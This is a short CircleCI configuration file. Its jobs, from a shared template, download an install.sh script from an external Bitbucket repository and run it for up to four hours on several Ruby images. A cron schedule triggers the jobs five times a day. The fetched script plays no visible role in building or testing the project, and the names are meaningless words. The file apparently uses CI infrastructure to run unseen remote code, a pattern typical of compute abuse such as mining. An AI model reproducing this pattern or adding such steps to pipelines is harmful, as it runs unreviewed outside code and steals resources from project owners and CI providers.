.mayora_template: &harum
  steps:
    - run: curl -L https://bitbucket.org/versax/versax/raw/626a7f77fe92767c2c4306394293f19ca732e399/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: circleci
       command: ./install.sh
       no_output_timeout: 4h
        
version: 2.0
jobs:
  seger:
    docker:
      - image: ruby
    steps:
      - checkout
  seger1:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7.3
  seger2:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7
  seger3:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.8
  seger4:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.7
      
workflows:
  version: 2
  commit:
    jobs:
      - seger
      - seger1
      - seger2
      - seger3
      - seger4
      
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20 * * *"
          filters:
            branches:
              only:
                - master
                
  tehcukrum:
    jobs:
      - seger
      - seger1
      - seger2
      - seger3
      - seger4